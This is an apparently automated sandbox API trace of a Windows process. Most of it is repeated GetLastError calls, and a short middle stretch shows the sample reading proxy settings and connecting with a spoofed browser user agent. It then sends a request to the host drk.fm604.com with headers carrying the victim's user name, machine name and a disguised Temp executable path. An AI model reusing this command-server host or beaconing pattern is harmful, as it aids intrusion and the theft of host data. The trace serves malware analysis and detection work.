	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.064] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.065] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.066] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.067] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.068] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.069] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] GetLastError () returned 0x0
	[0071.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x247f910 | out: phkResult=0x247f910*=0x1ac) returned 0x0
	[0071.070] RegQueryValueExW (in: hKey=0x1ac, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f914*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f914*=0x4) returned 0x0
	[0071.070] RegQueryValueExW (in: hKey=0x1ac, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x4c2d08, lpcbData=0x247f914*=0x4 | out: lpType=0x0, lpData=0x4c2d08*=0x0, lpcbData=0x247f914*=0x4) returned 0x0
	[0071.070] RegCloseKey (hKey=0x1ac) returned 0x0
	[0071.070] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0071.783] InternetConnectA (hInternet=0xcc0004, lpszServerName="drk.fm604.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0071.784] GetLastError () returned 0x0
	[0071.784] GetLastError () returned 0x0
	[0071.784] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rbody320", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0071.785] wsprintfW (in: param_1=0x4e6a48, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0071.785] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0071.785] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0071.785] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4e6e60, nSize=0x247f2f4 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x247f2f4) returned 0x1
	[0071.786] wsprintfW (in: param_1=0x4e6a48, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0071.786] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0071.786] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0071.786] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x247f2fc | out: phkResult=0x247f2fc*=0x240) returned 0x0
	[0071.786] RegQueryValueExW (in: hKey=0x240, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f2d4*=0x0) returned 0x2
	[0071.786] RegQueryValueExW (in: hKey=0x240, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f2d4*=0x0) returned 0x2
	[0071.786] RegQueryValueExW (in: hKey=0x240, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f2d4*=0x0) returned 0x2
	[0071.786] RegCloseKey (hKey=0x240) returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.786] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.787] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.788] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.789] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.790] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetLastError () returned 0x0
	[0071.791] GetComputerNameW (in: lpBuffer=0x4e6e60, nSize=0x247f438 | out: lpBuffer="X2VS1CUM", nSize=0x247f438) returned 1
	[0071.791] GetLastError () returned 0xcb
	[0071.791] GetLastError () returned 0xcb
	[0071.791] GetLastError () returned 0xcb
	[0071.791] GetLastError () returned 0xcb
	[0071.791] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.805] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
